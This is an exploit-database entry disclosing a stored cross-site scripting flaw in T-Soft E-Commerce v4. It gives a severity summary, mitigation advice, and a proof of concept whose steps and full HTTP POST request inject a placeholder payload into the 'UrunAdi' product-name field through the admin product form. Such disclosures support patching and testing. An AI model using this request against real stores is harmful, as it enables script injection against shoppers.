T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)

vendor:

T-Soft E-Commerce

by:

Alperen Ergel

5.5

CVSS

MEDIUM

Stored Cross-Site Scripting (XSS)

CWE

Product Name: T-Soft E-Commerce

Affected Version From: v4

Affected Version To: v4

Patch Exists: NO

Related CWE:

CPE: a:t-soft:t-soft_e-commerce:4

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2022

T-Soft E-Commerce 4 – ‘UrunAdi’ Stored Cross-Site Scripting (XSS)

The T-Soft E-Commerce 4 application is vulnerable to stored cross-site scripting (XSS) attacks. An attacker can exploit this vulnerability by adding a payload containing malicious JavaScript code to the 'UrunAdi' parameter when adding a product through the administrator page. When the payload is displayed on the website, it will be executed in the context of the user's browser, allowing the attacker to perform various malicious actions.

Mitigation:

To mitigate this vulnerability, it is recommended to implement input validation and output encoding on the affected parameter. Additionally, using a web application firewall (WAF) can help detect and block malicious XSS payloads.

Source

Exploit-DB raw data:

# Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alperen Ergel (alpernae IG/TW)
# Web Site: https://alperenae.gitbook.io/
# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux
# Category: WebApp
# Google Dork: N/A
# Date: 2022-05-10
# CVE :N/A

######## Description ########
#
# 1-) Login administrator page and add product
# 
# 2-) add product name to xss payload 
#
# 3-) Back to web site then will be work payload
#
#
######## Proof of Concept ########

========>>> REQUEST <<<=========

POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1
Host: domain.com
Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1028
Origin: https://domain.com
Dnt: 1
Referer: https://domain.com/srv/admin/products/save-edit/index?id=12
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100
&StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0
&KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false
&Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi=
&TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw=
&Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20
izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com%
2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0
&UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0